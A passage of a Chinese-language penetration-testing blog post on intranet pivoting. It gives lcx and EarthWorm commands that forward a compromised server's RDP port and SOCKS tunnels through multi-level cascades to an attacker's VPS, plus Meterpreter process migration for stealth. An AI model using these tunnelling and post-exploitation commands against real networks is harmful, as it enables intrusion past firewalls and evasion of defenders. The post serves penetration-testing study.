<h4 id="Server"><a href="#Server" class="headerlink" title="Server"></a>Server</h4><p>这里的Server端，也是目标服务器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lcx -slave 126.126.126.126 12600 10.10.10.10 3389</span><br></pre></td></tr></table></figure>
<p>将目标服务器3389端口所有的数据都转发到公网VPS的12600端口上</p>
<h4 id="VPS"><a href="#VPS" class="headerlink" title="VPS"></a>VPS</h4><p>在VPS上执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lcx -listen 12600 126</span><br></pre></td></tr></table></figure>
<p>将VPS 12600端口所有的数据转发到本机的126端口上</p>
<h4 id="Client"><a href="#Client" class="headerlink" title="Client"></a>Client</h4><p>这里的Client，也是攻击机</p>
<p>在完成上述操作之后，可以在Client上用mstsc登录VPS的126端口，或直接在VPS上用mstsc登录本机的126端口，即可访问Server(目标服务器)的3389端口</p>
<p>lcx工具实现的是一对一端口转发，如果想要对内网进行扫描，就需要将目标服务器的所有端口进行端口转发，整个过程非常耗费时间，而且都是重复操作</p>
<p>这种情况下，就需要Socks代理</p>
<h1 id="代理"><a href="#代理" class="headerlink" title="代理"></a>代理</h1><h2 id="Socks代理"><a href="#Socks代理" class="headerlink" title="Socks代理"></a>Socks代理</h2><p>Socks代理可以理解为一个增强版的lcx，它在Server监听一个服务端口，当有新的连接请求时会从Socks协议中解析出访问目标的URL的目标端口，再开始执行lcx的具体功能，默认端口1080</p>
<p>网络上Socks代理工具有很多，选用时尽可能使用无GUI界面的、尽可能不需要安装其他依赖软件的，能支持多平台操作系统的更佳</p>
<h3 id="正向代理"><a href="#正向代理" class="headerlink" title="正向代理"></a>正向代理</h3><p>攻击者主动通过代理来访问目标机器，目标机器可通过外网访问</p>
<h3 id="反向代理"><a href="#反向代理" class="headerlink" title="反向代理"></a>反向代理</h3><p>目标机器通过代理来访问攻击者</p>
<h3 id="Earthworm"><a href="#Earthworm" class="headerlink" title="Earthworm"></a>Earthworm</h3><p>下载地址：<a href="http://rootkiter.com/EarthWorm" target="_blank" rel="noopener">http://rootkiter.com/EarthWorm</a> </p>
<p>EW 是一套便携式的网络穿透工具，具有 SOCKS v5服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。工具包中提供了多种可执行文件，以适用不同的操作系统，Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用</p>
<h4 id="正向代理-1"><a href="#正向代理-1" class="headerlink" title="正向代理"></a>正向代理</h4><p>适用于目标机器拥有一个外网IP</p>
<h5 id="Server-目标机器"><a href="#Server-目标机器" class="headerlink" title="Server(目标机器)"></a>Server(目标机器)</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s ssocksd -l 12600</span><br></pre></td></tr></table></figure>
<p>目标机器假设了一个端口为12600的Socks代理，使用SocksCap64添加代理就可以直接连接目标机器</p>
<h5 id="Client-攻击者"><a href="#Client-攻击者" class="headerlink" title="Client(攻击者)"></a>Client(攻击者)</h5><p>使用SocksCap64连接</p>
<h4 id="反向代理-1"><a href="#反向代理-1" class="headerlink" title="反向代理"></a>反向代理</h4><p>适用于目标机器没有公网IP，但可访问内网资源</p>
<h5 id="VPS-1"><a href="#VPS-1" class="headerlink" title="VPS"></a>VPS</h5><p>将Earthworm上传到VPS上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s rcsocks -l 1080 -e 126</span><br></pre></td></tr></table></figure>
<p>在VPS上添加一个转接隧道，把1080端口收到的代理请求转交给126端口</p>
<h5 id="目标机器"><a href="#目标机器" class="headerlink" title="目标机器"></a>目标机器</h5><p>将Earthworm上传到目标机器上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s rssocks -d 126.126.126.126 -e 126</span><br></pre></td></tr></table></figure>
<p>在目标机器上启动Socks V5服务，并反弹到VPS的126端口上</p>
<h5 id="VPS-2"><a href="#VPS-2" class="headerlink" title="VPS"></a>VPS</h5><p>查看VPS的CMD界面，若反弹成功，则可以通过访问VPS的1080端口使用假设在目标机器上的Socks5代理服务</p>
<h4 id="二级级联"><a href="#二级级联" class="headerlink" title="二级级联"></a>二级级联</h4><h5 id="情况1"><a href="#情况1" class="headerlink" title="情况1"></a>情况1</h5><p>假设获得了Server A和Server B的控制权限，A主机配有2块网卡，一块连通外网，一块10.10.10.10只能连接内网Server B，无法访问内网其它资源。Server B可以访问内网资源，但无法访问外网</p>
<p><img src="/2019/06/01/Intranet-Infiltration/03.01.Two-Level.png" alt></p>
<h6 id="Server-B"><a href="#Server-B" class="headerlink" title="Server B"></a>Server B</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s ssocksd -l 126</span><br></pre></td></tr></table></figure>
<p>使用ssocksd方式启动126端口的Socks代理</p>
<h6 id="Server-A"><a href="#Server-A" class="headerlink" title="Server A"></a>Server A</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s lcx_tran -l 1080 -f 10.10.10.26 -g 126</span><br></pre></td></tr></table></figure>
<p>将1080端口收到的代理请求转交给Server B的126端口</p>
<p>通过使用Server A的外网<code>26.26.26.26:1080</code>来使用在Server B架设的Socks5代理</p>
<h5 id="情况2"><a href="#情况2" class="headerlink" title="情况2"></a>情况2</h5><p>假设获得了Server A和Server B的控制权限，Server A没有公网IP，也无法访问内网资源。Server B可以访问内网资源，但无法访问外网</p>
<p><img src="/2019/06/01/Intranet-Infiltration/03.02.Two-Level.png" alt></p>
<h6 id="VPS-3"><a href="#VPS-3" class="headerlink" title="VPS"></a>VPS</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew –s lcx_listen –l 10800 –e 12600</span><br></pre></td></tr></table></figure>
<p>在VPS添加转接隧道，将10800端口收到的代理请求转交给126端口</p>
<h6 id="Server-B-1"><a href="#Server-B-1" class="headerlink" title="Server B"></a>Server B</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s ssocksd -l 126</span><br></pre></td></tr></table></figure>
<p>利用ssocksd方式启动126端口的socks代理</p>
<h6 id="Server-A-1"><a href="#Server-A-1" class="headerlink" title="Server A"></a>Server A</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s lcx_slave -d 126.126.126.126 -e 12600 -f 10.10.10.26 -g 126</span><br></pre></td></tr></table></figure>
<p>在Server A上利用lcx_slave方式，将VPS的12600端口和Server B的126端口连接起来</p>
<h6 id="VPS-4"><a href="#VPS-4" class="headerlink" title="VPS"></a>VPS</h6><p>查看VPS的CMD界面，若连接成功，则可通过访问VPS地址<code>126.126.126.126:10800</code>来使用在B主机架设的Socks5代理</p>
<h4 id="三级级联"><a href="#三级级联" class="headerlink" title="三级级联"></a>三级级联</h4><p>三级网络环境在实际渗透中用的比较少，也比较复杂，现在我们来一个个的讲解下三级级联的用法</p>
<p>假设渗透场景：Server A没有公网IP但可以访问外网，Server B不能访问外网但可以被Server A访问、Server C可被Server B访问而且能够访问核心区域</p>
<p><img src="/2019/06/01/Intranet-Infiltration/03.03.Three-Level.png" alt></p>
<h5 id="VPS-5"><a href="#VPS-5" class="headerlink" title="VPS"></a>VPS</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s rcsocks -l 1080 -e 1260</span><br></pre></td></tr></table></figure>
<p>将1080端口收到的代理请求转交给1260端口</p>
<h5 id="Server-A-2"><a href="#Server-A-2" class="headerlink" title="Server A"></a>Server A</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s lcx_slave -d 126.126.126.126 -e 1260 -f 10.10.2.26 -g 126</span><br></pre></td></tr></table></figure>
<p>将VPS的1260端口和B主机的126端口连接起来</p>
<h5 id="Server-B-2"><a href="#Server-B-2" class="headerlink" title="Server B"></a>Server B</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s lcx_listen -l 126 -e 26</span><br></pre></td></tr></table></figure>
<p>将126端口收到的代理请求转交给26端口</p>
<h5 id="Server-C"><a href="#Server-C" class="headerlink" title="Server C"></a>Server C</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew -s rssocks -d 10.10.2.26 -e 26</span><br></pre></td></tr></table></figure>
<p>在C主机上启动SOCKS V5服务，并反弹到B主机的26端口上</p>
<h5 id="Client-1"><a href="#Client-1" class="headerlink" title="Client"></a>Client</h5><p>在Client上访问VPS<code>126.126.126.126:1080</code>来使用在Server C上架设的Socks5代理</p>
<p>整个数据流是：rssocks→1080→1260→126→26→Socks5</p>
<h1 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h1><h2 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h2><h3 id="进程迁移"><a href="#进程迁移" class="headerlink" title="进程迁移"></a>进程迁移</h3><p>获得Meterpreter Shell之后，第一步要做的是进程迁移，因为当前进程可能随时被用户关闭，而断开连接。将Shell和目标机器的一个稳定的进程绑定在一起，而不需要对磁盘进行任何写入操作，这会使得渗透过程更隐蔽。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#获得当前进程号</span><br><span class="line">getpid</span><br><span class="line">#查看当前系统运行进程</span><br><span class="line">ps</span><br><span class="line">#进程迁移，选择一个稳定的进程号</span><br><span class="line">migrate PID</span><br><span class="line">#Metasploit自动迁移进程</span><br><span class="line">run post/windows/manage/migrate</span><br></pre></td></tr></table></figure>
<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><h1 id="横向渗透"><a href="#横向渗透" class="headerlink" title="横向渗透"></a>横向渗透</h1><h1 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>域渗透</h1><h1 id="后门"><a href="#后门" class="headerlink" title="后门"></a>后门</h1><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p>[] <a href="https://mp.weixin.qq.com/s/VJBnXq3--0HBD7eVeifOKA" target="_blank" rel="noopener">【玩转Linux系统】Linux内网渗透</a></p>
<p>[] <a href="https://rcoil.me/2017/06/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" target="_blank" rel="noopener">内网渗透归纳（持续更新）</a></p>
<p>[] <a href="https://www.freebuf.com/column/177493.html" target="_blank" rel="noopener">【渗透技巧】内网渗透思路</a></p>
<p>[] <a href="https://www.freebuf.com/column/194091.html" target="_blank" rel="noopener">内网渗透–信息收集（一）</a></p>
<p>[] <a href="https://www.freebuf.com/column/194119.html" target="_blank" rel="noopener">内网渗透–信息收集（二）</a></p>
<p>[] <a href="https://www.freebuf.com/column/194134.html" target="_blank" rel="noopener">内网渗透–信息收集（三）</a></p>
<p>[] <a href="https://www.freebuf.com/column/194524.html" target="_blank" rel="noopener">内网渗透信息收集综合实操报告</a></p>
<p>[] <a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E4%BB%A3%E7%90%86/" target="_blank" rel="noopener">渗透基础——端口转发与代理</a></p>
<p>[] <a href="https://rcoil.me/2017/06/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E4%B9%8B-%E4%BB%A3%E7%90%86%E7%AF%87/" target="_blank" rel="noopener">渗透测试 之 代理篇</a></p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/29/Security-Emergency-Response/" rel="next" title="'安全应急响应'">
                <i class="fa fa-chevron-left"></i> '安全应急响应'
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2026/05/28/Will-i/" rel="prev" title="'Diary'">
                'Diary' <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">chessur</p>
              <div class="site-description motion-element" itemprop="description"></div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">33</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">tags</span>
                  
                </div>
              
            </nav>
          

          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/ChireC" title="GitHub &rarr; https://github.com/ChireC" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#信息收集"><span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#通用信息"><span class="nav-text">通用信息</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#网络配置信息"><span class="nav-text">网络配置信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#网络环境"><span class="nav-text">网络环境</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#存活IP"><span class="nav-text">存活IP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-text">nmap</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#nmap-vulners"><span class="nav-text">nmap-vulners</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#nmap-vulscan"><span class="nav-text">nmap-vulscan</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#敏感信息"><span class="nav-text">敏感信息</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows"><span class="nav-text">Windows</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#网络信息"><span class="nav-text">网络信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#域信息"><span class="nav-text">域信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#端口信息"><span class="nav-text">端口信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#系统信息"><span class="nav-text">系统信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#安装信息"><span class="nav-text">安装信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#进程信息"><span class="nav-text">进程信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#用户信息"><span class="nav-text">用户信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#敏感文件"><span class="nav-text">敏感文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#密码Hash"><span class="nav-text">密码Hash</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#从SAM中提取目标系统本地用户密码Hash"><span class="nav-text">从SAM中提取目标系统本地用户密码Hash</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#通过dump-lsass-exe进程数据离线免杀抓取明文"><span class="nav-text">通过dump lsass.exe进程数据离线免杀抓取明文</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-procdump-exe"><span class="nav-text">1.procdump.exe</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-PowerShell"><span class="nav-text">2.PowerShell</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-SqlDumper"><span class="nav-text">3.SqlDumper</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#windows-10-2012r2-以后系统的明文密码抓取方式"><span class="nav-text">windows 10 / 2012r2 以后系统的明文密码抓取方式</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Linux"><span class="nav-text">Linux</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#系统信息-1"><span class="nav-text">系统信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#网络信息-1"><span class="nav-text">网络信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#敏感文件-1"><span class="nav-text">敏感文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#进程信息-1"><span class="nav-text">进程信息</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#端口转发"><span class="nav-text">端口转发</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Socket端口转发"><span class="nav-text">Socket端口转发</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#lcx"><span class="nav-text">lcx</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Server"><span class="nav-text">Server</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#VPS"><span class="nav-text">VPS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Client"><span class="nav-text">Client</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#代理"><span class="nav-text">代理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Socks代理"><span class="nav-text">Socks代理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#正向代理"><span class="nav-text">正向代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#反向代理"><span class="nav-text">反向代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Earthworm"><span class="nav-text">Earthworm</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#正向代理-1"><span class="nav-text">正向代理</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Server-目标机器"><span class="nav-text">Server(目标机器)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Client-攻击者"><span class="nav-text">Client(攻击者)</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#反向代理-1"><span class="nav-text">反向代理</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#VPS-1"><span class="nav-text">VPS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#目标机器"><span class="nav-text">目标机器</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#VPS-2"><span class="nav-text">VPS</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#二级级联"><span class="nav-text">二级级联</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#情况1"><span class="nav-text">情况1</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#Server-B"><span class="nav-text">Server B</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#Server-A"><span class="nav-text">Server A</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#情况2"><span class="nav-text">情况2</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#VPS-3"><span class="nav-text">VPS</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#Server-B-1"><span class="nav-text">Server B</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#Server-A-1"><span class="nav-text">Server A</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#VPS-4"><span class="nav-text">VPS</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#三级级联"><span class="nav-text">三级级联</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#VPS-5"><span class="nav-text">VPS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Server-A-2"><span class="nav-text">Server A</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Server-B-2"><span class="nav-text">Server B</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Server-C"><span class="nav-text">Server C</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Client-1"><span class="nav-text">Client</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#工具"><span class="nav-text">工具</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Metasploit"><span class="nav-text">Metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#进程迁移"><span class="nav-text">进程迁移</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#提权"><span class="nav-text">提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#横向渗透"><span class="nav-text">横向渗透</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#域渗透"><span class="nav-text">域渗透</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#后门"><span class="nav-text">后门</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参考"><span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">chessur</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.1.1</div>




        








        
      </div>
    </footer>

    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/affix.js?v=7.1.1"></script>

  <script src="/js/schemes/pisces.js?v=7.1.1"></script>




  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  
<script>
  $('.highlight').not('.gist .highlight').each(function(i, e) {
    var $wrap = $('<div>').addClass('highlight-wrap');
    $(e).after($wrap);
    $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function(e) {
      var code = $(this).parent().find('.code').find('.line').map(function(i, e) {
        return $(e).text();
      }).toArray().join('\n');
      var ta = document.createElement('textarea');
      var yPosition = window.pageYOffset || document.documentElement.scrollTop;
      ta.style.top = yPosition + 'px'; // Prevent page scroll
      ta.style.position = 'absolute';
      ta.style.opacity = '0';
      ta.readOnly = true;
      ta.value = code;
      document.body.appendChild(ta);
      ta.select();
      ta.setSelectionRange(0, code.length);
      ta.readOnly = false;
      var result = document.execCommand('copy');
      
        if (result) $(this).text('Copied');
        else $(this).text('Copy failed');
      
      ta.blur(); // For iOS
      $(this).blur();
    })).on('mouseleave', function(e) {
      var $b = $(this).find('.copy-btn');
      setTimeout(function() {
        $b.text('Copy');
      }, 300);
    }).append(e);
  })
</script>


  

  

</body>
</html>
